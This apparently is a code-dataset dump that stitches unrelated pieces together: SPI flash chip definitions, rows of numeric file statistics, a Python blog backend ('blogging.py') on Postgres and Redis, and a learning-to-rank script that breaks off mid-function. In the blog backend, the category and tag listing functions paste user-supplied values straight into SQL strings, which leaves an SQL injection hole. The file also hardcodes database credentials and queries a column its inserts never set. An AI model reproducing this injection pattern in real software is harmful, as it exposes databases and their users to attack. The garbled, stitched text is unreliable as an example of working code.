total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class W25X10(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x3011
name = "w25x10"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class W25X16(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x3015
name = "w25x16"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class W25X20(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x3012
name = "w25x20"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class W25X32(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x3016
name = "w25x32"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class W25X40(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x3013
name = "w25x40"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class W25X64(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x3017
name = "w25x64"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class W25X80(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x3014
name = "w25x80"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class ZD25D20(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.THOMSON
device_id = 0x2012
name = "zd25d20"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class ZD25D40(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.THOMSON
device_id = 0x2013
name = "zd25d40"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
| 23.724114
| 59
| 0.655161
| 22,087
| 208,274
| 5.781591
| 0.035903
| 0.045999
| 0.029601
| 0.182681
| 0.915089
| 0.914744
| 0.913859
| 0.791524
| 0.790936
| 0.644113
| 0
| 0.130707
| 0.287621
| 208,274
| 8,778
| 60
| 23.726817
| 0.729966
| 0.027425
| 0
| 0.754914
| 1
| 0
| 0.021393
| 0
| 0
| 0
| 0.014077
| 0
| 0
| 1
| 0
| false
| 0
| 0.000468
| 0
| 0.664587
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 10
|
2a2155ef7508c71c7a3c1d299eb2cb41cd26a9fc
| 29,042
|
py
|
Python
|
blogging.py
|
theoriginalgangster/SimpleAuth
|
b4cf1ce94c18d43ba3fe396f974eeef8d2a6dbd3
|
[
"MIT"
] | null | null | null |
blogging.py
|
theoriginalgangster/SimpleAuth
|
b4cf1ce94c18d43ba3fe396f974eeef8d2a6dbd3
|
[
"MIT"
] | null | null | null |
blogging.py
|
theoriginalgangster/SimpleAuth
|
b4cf1ce94c18d43ba3fe396f974eeef8d2a6dbd3
|
[
"MIT"
] | null | null | null |
import redis
import psycopg2 as pg
import bcrypt
import random
import string
import datetime
import json
DBHOST = "localhost"
DBPORT = "5432"
DBNAME = "simple_auth"
DBUSER = "simple_auth"
DBPASS = "simple_auth"
REDISHOST = "localhost"
REDISPORT = 6379
# Redis key timeout.
# Timeout for session to remove itself after
# inactivity.
# @TODO Note: Make sure to expire every time
# you set something or else this won't work.
# need to put this in a function.
SESSION_EXPIRE_MINUTES = 30
ADMIN_KEY = "ADMIN_KEY"
UE = "Unknown Error"
def get_redis_conn():
redis_conn = redis.StrictRedis(
host = REDISHOST,
port = REDISPORT,
db = 0
)
return redis_conn
def get_pg_conn_curser():
pg_conn = pg.connect(
host = DBHOST,
port = DBPORT,
dbname = DBNAME,
user = DBUSER,
password = DBPASS
)
pg_cursor = pg_conn.cursor()
return pg_conn, pg_cursor
def log_auth_exception(exception):
print(exception)
def get_default_response():
response = {}
response['success'] = False
response['error_code'] = "UE"
response['error'] = UE
return response
def set_response_failed(response):
# Return a resonse only with a status of flase and the error and the
# error_code.
new_response = {}
new_response['error'] = response['error']
new_response['error_code'] = response['error_code']
new_response['success'] = False
return new_response
def set_response_success(response):
# Remove error and error_code from response. Finally set success
# to true.
if response['error'] is not None:
response.pop('error')
if response['error_code'] is not None:
response.pop('error_code')
response['success'] = True
return response
def generate_cookie():
return ''.join(random.choice(string.lowercase) for i in range(29))
"""----------------------------------------------------------------------------
Create New Post (Postgres)
----------------------------------------------------------------------------"""
CNP_1 = "Unrecognized app_token."
CNP_2 = "Post with that title already exists."
CNP_3 = "Unknown author. Author must have an admin account."
def CreateNewPost(app_token, title, author, publication_timestamp, main_image_url, content, tags, category, hidden):
response = get_default_response()
try:
# First authenticate the user and make sure their cookie exists.
redis_conn = get_redis_conn()
session = redis_conn.get(app_token)
if session is None:
# Unknown g_apptoken.
# The user is not authenticated.
response['error_code'] = "CNP_1"
response['error'] = CNP_1
response = set_response_failed(response)
return response
session = json.loads(session)
pg_conn, pg_curs = get_pg_conn_curser()
# Insert the post.
pg_curs.execute("""
PREPARE CreateNewPost_sub1(text, text, text, text, text, text, boolean) AS
INSERT INTO
blog_posts
(
title,
author,
publication_timestamp,
main_image_url,
content,
category,
hidden
) VALUES ($1, $2, to_timestamp($3, 'dd-mm-yyyy hh24:mi:ss'), $4, $5, $6, $7);
EXECUTE CreateNewPost_sub1(%s, %s, %s, %s, %s, %s, %s);
""",
(
title,
author,
publication_timestamp,
main_image_url,
content,
category,
hidden,
)
)
pg_conn.commit()
pg_conn.close()
# Associate all the tags.
# @TODO Figure out what the hell is going on with prepared
# statements already existing so I don't have to open a new
# db connection to associate tags.
for tag in tags:
pg_conn, pg_curs = get_pg_conn_curser()
pg_curs.execute("""
PREPARE CreateNewPost_sub1(text, text) AS
INSERT INTO
blog_post_tags
(
post_title,
tag
) VALUES ($1, $2);
EXECUTE CreateNewPost_sub1(%s, %s);
""",
(
title,
tag,
)
)
pg_conn.commit()
pg_conn.close()
# Return response.
response = set_response_success(response)
return response
except Exception as ex:
log_auth_exception(ex)
# Close the db connection.
try:
pg_conn.close()
except:
pass
# Check for foreign key errors.
if ("title" in str(ex)) and ("already exists" in str(ex)):
response['error_code'] = "CNP_2"
response['error'] = CNP_2
response = set_response_failed(response)
return response
if ("author" in str(ex)) and ("not present" in str(ex)):
response['error_code'] = "CNP_3"
response['error'] = CNP_3
response = set_response_failed(response)
return response
# Return default failure response.
response = set_response_failed(response)
return response
# print(CreateNewPost("ecqvepmfpwmzzmrqmcbcsvtwqwdrk", "example_title", "example_user@gmail.com", "2017-04-05 21:46:05.243873", "example_main_image_url", "example_content", ["example_tag_1", "exapmle_tag_2"], "example_category", False))
"""----------------------------------------------------------------------------
Edit Post (Postgres)
----------------------------------------------------------------------------"""
EP_1 = "Unrecognized app_token."
EP_2 = "Post with that title already exists."
EP_3 = "Unknown author. Author must have an admin account."
def EditPost(app_token, post_id, title, author, publication_timestamp, main_image_url, content, tags, category, hidden):
response = get_default_response()
try:
# First authenticate the user and make sure their cookie exists.
redis_conn = get_redis_conn()
session = redis_conn.get(app_token)
if session is None:
# Unknown g_apptoken.
# The user is not authenticated.
response['error_code'] = "EP_1"
response['error'] = EP_1
response = set_response_failed(response)
return response
session = json.loads(session)
pg_conn, pg_curs = get_pg_conn_curser()
# Insert the post.
pg_curs.execute("""
PREPARE CreateNewPost_sub1(text, text, text, text, text, text, boolean, integer) AS
UPDATE
blog_posts
SET
title = $1,
author = $2,
publication_timestamp = to_timestamp($3, 'dd-mm-yyyy hh24:mi:ss'),
main_image_url = $4,
content = $5,
category = $6,
hidden = $7
WHERE
id = $8;
EXECUTE CreateNewPost_sub1(%s, %s, %s, %s, %s, %s, %s, %s);
""",
(
title,
author,
publication_timestamp,
main_image_url,
content,
category,
hidden,
post_id,
)
)
pg_conn.commit()
pg_conn.close()
# Delete all the tags associated with the post so you
# can update them with the one's in this update command.
pg_conn, pg_curs = get_pg_conn_curser()
pg_curs.execute("""
PREPARE CreateNewPost_sub2(text) AS
DELETE FROM
blog_post_tags
WHERE
post_title = $1;
EXECUTE CreateNewPost_sub2(%s);
""",
(
title,
)
)
pg_conn.commit()
pg_conn.close()
# Associate all the tags.
# @TODO Figure out what the hell is going on with prepared
# statements already existing so I don't have to open a new
# db connection to associate tags.
for tag in tags:
pg_conn, pg_curs = get_pg_conn_curser()
pg_curs.execute("""
PREPARE CreateNewPost_sub1(text, text) AS
INSERT INTO
blog_post_tags
(
post_title,
tag
) VALUES ($1, $2);
EXECUTE CreateNewPost_sub1(%s, %s);
""",
(
title,
tag,
)
)
pg_conn.commit()
pg_conn.close()
# Return response.
response = set_response_success(response)
return response
except Exception as ex:
log_auth_exception(ex)
# Close the db connection.
try:
pg_conn.close()
except:
pass
# Return default failure response.
# Check for foreign key errors.
if ("title" in str(ex)) and ("already exists" in str(ex)):
response['error_code'] = "EP_2"
response['error'] = EP_2
response = set_response_failed(response)
return response
if ("author" in str(ex)) and ("not present" in str(ex)):
response['error_code'] = "EP_3"
response['error'] = EP_3
response = set_response_failed(response)
return response
response = set_response_failed(response)
return response
# print(EditPost("ecqvepmfpwmzzmrqmcbcsvtwqwdrk", 26, "Nexample_title", "example_user@gmail.com", "2017-04-05 21:46:05.243873", "Nexample_main_image_url", "Nexample_content", ["Nexample_tag_1", "Nexapmle_tag_2"], "Nexample_category", False))
"""----------------------------------------------------------------------------
Load Full Post (Postgres)
----------------------------------------------------------------------------"""
LFP_1 = "Unknown title."
def LoadFullPost(title):
response = get_default_response()
try:
pg_conn, pg_curs = get_pg_conn_curser()
# Insert the session into the gitkit_native_message_inbox table.
pg_curs.execute("""
PREPARE LoadFullPost_sub1(text) AS
SELECT
id,
title,
author,
publication_timestamp,
creation_timestamp,
main_image_url,
content,
category,
hidden,
view_count,
preview_count,
comment_count
FROM
blog_posts
WHERE
title = $1;
EXECUTE LoadFullPost_sub1(%s);
""",
(
title,
)
)
result = pg_curs.fetchone()
# If there are no messages, send response back with no empty array.
if result is None:
# Unknown title.
response['error_code'] = "LFP_1"
response['error'] = LFP_1
response = set_response_failed(response)
return response
# Update and increment the post view.
pg_curs.execute("""
PREPARE LoadFullPost_sub2(text) AS
UPDATE
blog_posts
SET
view_count = view_count + 1
WHERE
title = $1;
EXECUTE LoadFullPost_sub2(%s);
""",
(
title,
)
)
pg_conn.commit()
# Close the db connection.
pg_conn.close()
# Set the respone variables.
response['id'] = result[0]
response['title'] = result[1]
response['author'] = result[2]
response['publication_timestamp'] = str(result[3])
response['creation_timestamp'] = str(result[4])
response['main_image_url'] = result[5]
response['content'] = result[6]
response['category'] = result[7]
response['hidden'] = result[8]
response['view_count'] = result[9]
response['preview_count'] = result[10]
response['comment_count'] = result[11]
# Return the response.
response = set_response_success(response)
return response
except Exception as ex:
log_auth_exception(ex)
# Close the db connection.
try:
pg_conn.close()
except:
pass
# Return default failure response.
response = set_response_failed(response)
return response
# import pprint as pp
# pp.pprint(LoadFullPost("Nexample_title"))
"""----------------------------------------------------------------------------
Load Post Analytics (Postgres, Redis)
----------------------------------------------------------------------------"""
def LoadPostAnalytics(cookie, title):
print("test")
"""----------------------------------------------------------------------------
Load Blog Analytics (Postgres, Redis)
----------------------------------------------------------------------------"""
def LoadBlogAnalytics(cookie):
print("test")
"""----------------------------------------------------------------------------
Load Posts By Category (Postgres)
----------------------------------------------------------------------------"""
LPBC_1 = "Unknown category."
def LoadPostsByCategory(category, max_posts, pagination, only_published = True):
response = get_default_response()
try:
pg_conn, pg_curs = get_pg_conn_curser()
# Depending on if the post is published, meaning
# that the published time is after today, we're going
# to insert the publish where clause which may be
# an empty string if the flag 'only_published' is not true.
if (only_published == True):
published_where_clause = """
TO_CHAR(publication_timestamp, 'YYYY-MM-DD') <= TO_CHAR(NOW(), 'YYYY-MM-DD')
AND
published = True
AND"""
else:
published_where_clause = ""
# Calculate offset from max_posts and pagination.
offset = max_posts * pagination
# You have to concat the sql by yourself if you're
# going to insert the where clasue because the
# execute will wrap quote around it thinking it's
# a string.
sql = """
PREPARE LoadPostsByCategory_sub1(text, integer, integer) AS
SELECT
id,
title,
author,
publication_timestamp,
creation_timestamp,
main_image_url,
LEFT(content, 59),
category,
hidden,
view_count,
preview_count,
comment_count
FROM
blog_posts
WHERE
%s
category = $1
ORDER BY
publication_timestamp
DESC
LIMIT $2
OFFSET $3;
EXECUTE LoadPostsByCategory_sub1('%s', %s, %s);
""" % (
published_where_clause,
category,
max_posts,
offset,
)
# Fetch them.
pg_curs.execute(sql)
result = pg_curs.fetchall()
# If there are no posts, send response back with no empty array.
if result is None:
response['posts'] = []
response = set_response_success(response)
return response
posts = []
post_ids = []
for row in result:
post = {}
post['id'] = row[0]
post['title'] = row[1]
post['author'] = row[2]
post['publication_timestamp'] = str(row[3])
post['creation_timestamp'] = str(row[4])
post['main_image_url'] = row[5]
post['content'] = row[6]
post['category'] = row[7]
post['hidden'] = row[8]
post['view_count'] = row[9]
post['preview_count'] = row[10]
post['comment_count'] = row[11]
posts.append(post)
post_ids.append(row[0])
# Update and increment the post view.
if len(result) != 0:
update_previews_sql = """
UPDATE
blog_posts
SET
preview_count = preview_count + 1
WHERE
id in (%s)
""" % (
','.join(str(post_id) for post_id in post_ids),
)
pg_curs.execute(update_previews_sql)
pg_conn.commit()
# Close the db connection.
pg_conn.close()
response['posts'] = posts
# Return the response.
response = set_response_success(response)
return response
except Exception as ex:
log_auth_exception(ex)
# Close the db connection.
try:
pg_conn.close()
except:
pass
# Return default failure response.
response = set_response_failed(response)
return response
# import pprint as pp
# pp.pprint(LoadPostsByCategory('testthing', 4, 0))
# pp.pprint(LoadPostsByCategory('testthing', 4, 0, False))
"""----------------------------------------------------------------------------
Load Posts By Tag (Postgres)
----------------------------------------------------------------------------"""
def LoadPostsByTag(tag, max_posts, pagination, only_published = True):
response = get_default_response()
try:
pg_conn, pg_curs = get_pg_conn_curser()
# Depending on if the post is published, meaning
# that the published time is after today, we're going
# to insert the publish where clause which may be
# an empty string if the flag 'only_published' is not true.
if (only_published == True):
published_where_clause = """
TO_CHAR(publication_timestamp, 'YYYY-MM-DD') <= TO_CHAR(NOW(), 'YYYY-MM-DD')
AND
published = True
AND"""
else:
published_where_clause = ""
# Calculate offset from max_posts and pagination.
offset = max_posts * pagination
# You have to concat the sql by yourself if you're
# going to insert the where clasue because the
# execute will wrap quote around it thinking it's
# a string.
sql = """
PREPARE LoadPostsByTags_sub1(text, integer, integer) AS
SELECT
bp.id,
bp.title,
bp.author,
bp.publication_timestamp,
bp.creation_timestamp,
bp.main_image_url,
LEFT(bp.content, 59),
bp.category,
bp.hidden,
bp.view_count,
bp.preview_count,
bp.comment_count
FROM
blog_posts bp
LEFT JOIN
blog_post_tags t
ON
bp.title = t.post_title
WHERE
%s
t.tag = $1
ORDER BY
publication_timestamp
DESC
LIMIT $2
OFFSET $3;
EXECUTE LoadPostsByTags_sub1('%s', %s, %s);
""" % (
published_where_clause,
tag,
max_posts,
offset,
)
# Fetch them.
pg_curs.execute(sql)
result = pg_curs.fetchall()
# If there are no posts, send response back with no empty array.
if result is None:
response['posts'] = []
response = set_response_success(response)
return response
posts = []
post_ids = []
for row in result:
post = {}
post['id'] = row[0]
post['title'] = row[1]
post['author'] = row[2]
post['publication_timestamp'] = str(row[3])
post['creation_timestamp'] = str(row[4])
post['main_image_url'] = row[5]
post['content'] = row[6]
post['category'] = row[7]
post['hidden'] = row[8]
post['view_count'] = row[9]
post['preview_count'] = row[10]
post['comment_count'] = row[11]
posts.append(post)
post_ids.append(row[0])
# Update and increment the post view.
if len(result) != 0:
update_previews_sql = """
UPDATE
blog_posts
SET
preview_count = preview_count + 1
WHERE
id in (%s)
""" % (
','.join(str(post_id) for post_id in post_ids),
)
pg_curs.execute(update_previews_sql)
pg_conn.commit()
# Close the db connection.
pg_conn.close()
response['posts'] = posts
# Return the response.
response = set_response_success(response)
return response
except Exception as ex:
log_auth_exception(ex)
# Close the db connection.
try:
pg_conn.close()
except:
pass
# Return default failure response.
response = set_response_failed(response)
return response
# import pprint as pp
# pp.pprint(LoadPostsByTag('Nexample_tag_1', 4, 0))
# pp.pprint(LoadPostsByTag('Nexample_tag_1', 4, 0, False))
"""----------------------------------------------------------------------------
Load Posts Most Recent (Postgres)
----------------------------------------------------------------------------"""
def LoadPostsMostRecent(max_posts, pagination, only_published = True):
response = get_default_response()
try:
pg_conn, pg_curs = get_pg_conn_curser()
# Depending on if the post is published, meaning
# that the published time is after today, we're going
# to insert the publish where clause which may be
# an empty string if the flag 'only_published' is not true.
if (only_published == True):
published_where_clause = """
WHERE
TO_CHAR(publication_timestamp, 'YYYY-MM-DD') <= TO_CHAR(NOW(), 'YYYY-MM-DD')
AND
published = True """
else:
published_where_clause = ""
# Calculate offset from max_posts and pagination.
offset = max_posts * pagination
# You have to concat the sql by yourself if you're
# going to insert the where clasue because the
# execute will wrap quote around it thinking it's
# a string.
sql = """
PREPARE LoadPostsByCategory_sub1(integer, integer) AS
SELECT
id,
title,
author,
publication_timestamp,
creation_timestamp,
main_image_url,
LEFT(content, 59),
category,
hidden,
view_count,
preview_count,
comment_count
FROM
blog_posts
%s
ORDER BY
publication_timestamp
DESC
LIMIT $1
OFFSET $2;
EXECUTE LoadPostsByCategory_sub1(%s, %s);
""" % (
published_where_clause,
max_posts,
offset,
)
# Fetch them.
pg_curs.execute(sql)
result = pg_curs.fetchall()
# If there are no posts, send response back with no empty array.
if result is None:
response['posts'] = []
response = set_response_success(response)
return response
posts = []
post_ids = []
for row in result:
post = {}
post['id'] = row[0]
post['title'] = row[1]
post['author'] = row[2]
post['publication_timestamp'] = str(row[3])
post['creation_timestamp'] = str(row[4])
post['main_image_url'] = row[5]
post['content'] = row[6]
post['category'] = row[7]
post['hidden'] = row[8]
post['view_count'] = row[9]
post['preview_count'] = row[10]
post['comment_count'] = row[11]
posts.append(post)
post_ids.append(row[0])
# Update and increment the post view.
if len(result) != 0:
update_previews_sql = """
UPDATE
blog_posts
SET
preview_count = preview_count + 1
WHERE
id in (%s)
""" % (
','.join(str(post_id) for post_id in post_ids),
)
pg_curs.execute(update_previews_sql)
pg_conn.commit()
# Close the db connection.
pg_conn.close()
response['posts'] = posts
# Return the response.
response = set_response_success(response)
return response
except Exception as ex:
log_auth_exception(ex)
# Close the db connection.
try:
pg_conn.close()
except:
pass
# Return default failure response.
response = set_response_failed(response)
return response
# import pprint as pp
# pp.pprint(LoadPostsMostRecent(4, 0))
# pp.pprint(LoadPostsMostRecent(4, 0, False))
"""----------------------------------------------------------------------------
Load Posts Most Viewed (Postgres)
----------------------------------------------------------------------------"""
def LoadPostsMostViewed(max_posts, pagination, only_published = True):
response = get_default_response()
try:
pg_conn, pg_curs = get_pg_conn_curser()
# Depending on if the post is published, meaning
# that the published time is after today, we're going
# to insert the publish where clause which may be
# an empty string if the flag 'only_published' is not true.
if (only_published == True):
published_where_clause = """
WHERE
TO_CHAR(publication_timestamp, 'YYYY-MM-DD') <= TO_CHAR(NOW(), 'YYYY-MM-DD')
AND
published = True """
else:
published_where_clause = ""
# Calculate offset from max_posts and pagination.
offset = max_posts * pagination
# You have to concat the sql by yourself if you're
# going to insert the where clasue because the
# execute will wrap quote around it thinking it's
# a string.
sql = """
PREPARE LoadPostsByCategory_sub1(integer, integer) AS
SELECT
id,
title,
author,
publication_timestamp,
creation_timestamp,
main_image_url,
LEFT(content, 59),
category,
hidden,
view_count,
preview_count,
comment_count
FROM
blog_posts
%s
ORDER BY
view_count
DESC
LIMIT $1
OFFSET $2;
EXECUTE LoadPostsByCategory_sub1(%s, %s);
""" % (
published_where_clause,
max_posts,
offset,
)
# Fetch them.
pg_curs.execute(sql)
result = pg_curs.fetchall()
# If there are no posts, send response back with no empty array.
if result is None:
response['posts'] = []
response = set_response_success(response)
return response
posts = []
post_ids = []
for row in result:
post = {}
post['id'] = row[0]
post['title'] = row[1]
post['author'] = row[2]
post['publication_timestamp'] = str(row[3])
post['creation_timestamp'] = str(row[4])
post['main_image_url'] = row[5]
post['content'] = row[6]
post['category'] = row[7]
post['hidden'] = row[8]
post['view_count'] = row[9]
post['preview_count'] = row[10]
post['comment_count'] = row[11]
posts.append(post)
post_ids.append(row[0])
# Update and increment the post view.
if len(result) != 0:
update_previews_sql = """
UPDATE
blog_posts
SET
preview_count = preview_count + 1
WHERE
id in (%s)
""" % (
','.join(str(post_id) for post_id in post_ids),
)
pg_curs.execute(update_previews_sql)
pg_conn.commit()
# Close the db connection.
pg_conn.close()
response['posts'] = posts
# Return the response.
response = set_response_success(response)
return response
except Exception as ex:
log_auth_exception(ex)
# Close the db connection.
try:
pg_conn.close()
except:
pass
# Return default failure response.
response = set_response_failed(response)
return response
# import pprint as pp
# pp.pprint(LoadPostsMostViewed(4, 0))
# pp.pprint(LoadPostsMostViewed(4, 0, False))
"""----------------------------------------------------------------------------
Load Posts Most Previewed (Postgres)
----------------------------------------------------------------------------"""
def LoadPostsMostPreviewed(max_posts, pagination, only_published = True):
response = get_default_response()
try:
pg_conn, pg_curs = get_pg_conn_curser()
# Depending on if the post is published, meaning
# that the published time is after today, we're going
# to insert the publish where clause which may be
# an empty string if the flag 'only_published' is not true.
if (only_published == True):
published_where_clause = """
WHERE
TO_CHAR(publication_timestamp, 'YYYY-MM-DD') <= TO_CHAR(NOW(), 'YYYY-MM-DD')
AND
published = True """
else:
published_where_clause = ""
# Calculate offset from max_posts and pagination.
offset = max_posts * pagination
# You have to concat the sql by yourself if you're
# going to insert the where clasue because the
# execute will wrap quote around it thinking it's
# a string.
sql = """
PREPARE LoadPostsByCategory_sub1(integer, integer) AS
SELECT
id,
title,
author,
publication_timestamp,
creation_timestamp,
main_image_url,
LEFT(content, 59),
category,
hidden,
view_count,
preview_count,
comment_count
FROM
blog_posts
%s
ORDER BY
preview_count
DESC
LIMIT $1
OFFSET $2;
EXECUTE LoadPostsByCategory_sub1(%s, %s);
""" % (
published_where_clause,
max_posts,
offset,
)
# Fetch them.
pg_curs.execute(sql)
result = pg_curs.fetchall()
# If there are no posts, send response back with no empty array.
if result is None:
response['posts'] = []
response = set_response_success(response)
return response
posts = []
post_ids = []
for row in result:
post = {}
post['id'] = row[0]
post['title'] = row[1]
post['author'] = row[2]
post['publication_timestamp'] = str(row[3])
post['creation_timestamp'] = str(row[4])
post['main_image_url'] = row[5]
post['content'] = row[6]
post['category'] = row[7]
post['hidden'] = row[8]
post['view_count'] = row[9]
post['preview_count'] = row[10]
post['comment_count'] = row[11]
posts.append(post)
post_ids.append(row[0])
# Update and increment the post view.
if len(result) != 0:
update_previews_sql = """
UPDATE
blog_posts
SET
preview_count = preview_count + 1
WHERE
id in (%s)
""" % (
','.join(str(post_id) for post_id in post_ids),
)
pg_curs.execute(update_previews_sql)
pg_conn.commit()
# Close the db connection.
pg_conn.close()
response['posts'] = posts
# Return the response.
response = set_response_success(response)
return response
except Exception as ex:
log_auth_exception(ex)
# Close the db connection.
try:
pg_conn.close()
except:
pass
# Return default failure response.
response = set_response_failed(response)
return response
# import pprint as pp
# pp.pprint(LoadPostsMostPreviewed(4, 0))
# pp.pprint(LoadPostsMostPreviewed(4, 0, False))
"""----------------------------------------------------------------------------
Load All Categories (Postgres)
----------------------------------------------------------------------------"""
def LoadAllCategories():
response = get_default_response()
try:
pg_conn, pg_curs = get_pg_conn_curser()
# Fetch them.
pg_curs.execute("""
SELECT DISTINCT
category,
COUNT(*)
FROM
blog_posts
GROUP BY 1
""")
result = pg_curs.fetchall()
# If there are no categories, send response back with no empty array.
if result is None:
response['categories'] = []
response = set_response_success(response)
return response
categories = []
for row in result:
category = {}
category['name'] = row[0]
category['count'] = row[1]
categories.append(category)
pg_conn.close()
response['categories'] = categories
# Return the response.
response = set_response_success(response)
return response
except Exception as ex:
log_auth_exception(ex)
# Close the db connection.
try:
pg_conn.close()
except:
pass
# Return default failure response.
response = set_response_failed(response)
return response
# import pprint as pp
# pp.pprint(LoadAllCategories())
"""----------------------------------------------------------------------------
Load All Tags (Postgres)
----------------------------------------------------------------------------"""
def LoadAllTags():
response = get_default_response()
try:
pg_conn, pg_curs = get_pg_conn_curser()
# Fetch them.
pg_curs.execute("""
SELECT DISTINCT
tag,
COUNT(*)
FROM
blog_post_tags
GROUP BY 1
""")
result = pg_curs.fetchall()
# If there are no tags, send response back with no empty array.
if result is None:
response['tags'] = []
response = set_response_success(response)
return response
tags = []
for row in result:
tag = {}
tag['name'] = row[0]
tag['count'] = row[1]
tags.append(tag)
pg_conn.close()
response['tags'] = tags
# Return the response.
response = set_response_success(response)
return response
except Exception as ex:
log_auth_exception(ex)
# Close the db connection.
try:
pg_conn.close()
except:
pass
# Return default failure response.
response = set_response_failed(response)
return response
# import pprint as pp
# pp.pprint(LoadAllTags())
| 26.187556
| 241
| 0.631086
| 3,698
| 29,042
| 4.780422
| 0.086263
| 0.021722
| 0.036543
| 0.030546
| 0.802636
| 0.778934
| 0.761851
| 0.748897
| 0.737583
| 0.730739
| 0
| 0.012147
| 0.200606
| 29,042
| 1,108
| 242
| 26.211191
| 0.749311
| 0.213105
| 0
| 0.765882
| 0
| 0.009412
| 0.330258
| 0.056679
| 0
| 0
| 0
| 0.002708
| 0
| 0
| null | null | 0.014118
| 0.008235
| null | null | 0.003529
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2a7f1b2d37c863b54685948ccbc79d7c12bbc311
| 25,931
|
py
|
Python
|
utils/arp_ips.py
|
HarrieO/2020topkunbiasedltr
|
f6e191a6cb6d52a375a1ec213e42dbbda8fdb8ff
|
[
"MIT"
] | 4
|
2021-05-04T04:42:59.000Z
|
2021-10-06T09:41:28.000Z
|
utils/arp_ips.py
|
HarrieO/2020topkunbiasedltr
|
f6e191a6cb6d52a375a1ec213e42dbbda8fdb8ff
|
[
"MIT"
] | null | null | null |
utils/arp_ips.py
|
HarrieO/2020topkunbiasedltr
|
f6e191a6cb6d52a375a1ec213e42dbbda8fdb8ff
|
[
"MIT"
] | null | null | null |
# Copyright (C) H.R. Oosterhuis 2020.
# Distributed under the MIT License (see the accompanying README.md and LICENSE files).
import numpy as np
import time
import multi_click_models as clk
def calc_true_loss(ranking_model, data_split):
all_docs = data_split.feature_matrix
all_scores = np.dot(all_docs, ranking_model)
result = 0.
denom = 0.
for qid in np.arange(data_split.num_queries()):
s_i, e_i = data_split.doclist_ranges[qid:qid+2]
q_scores = all_scores[s_i:e_i]
q_labels = data_split.query_labels(qid)
label_filter = np.greater(q_labels, 2)
inv_ranking = clk.rank_and_invert(q_scores)[1]
result += np.sum(inv_ranking[label_filter]+1.)
denom += np.sum(label_filter)
return result/denom
def estimate_loss(ranking_model,
data_split,
clicks):
total_clicks = clicks['num_clicks']
doc_clicks = clicks['clicks_per_doc'].astype(np.float64)
inv_prop = clicks['average_weights']*(doc_clicks/float(total_clicks))
inv_prop /= np.sum(inv_prop)
all_docs = data_split.feature_matrix
all_scores = np.dot(all_docs, ranking_model)
rerank = clicks['rerank']
if rerank:
rerank_ranges = clicks['rerank_ranges']
n_doc_per_q = (data_split.doclist_ranges[1:]
- data_split.doclist_ranges[:-1])
def rerank_get(qid, values):
s_j, e_j = rerank_ranges[qid:qid+2]
n = n_doc_per_q[qid]
return np.reshape(values[s_j:e_j], (n, n))
result = 0.
denom = 0.
for qid in clicks['queries']:
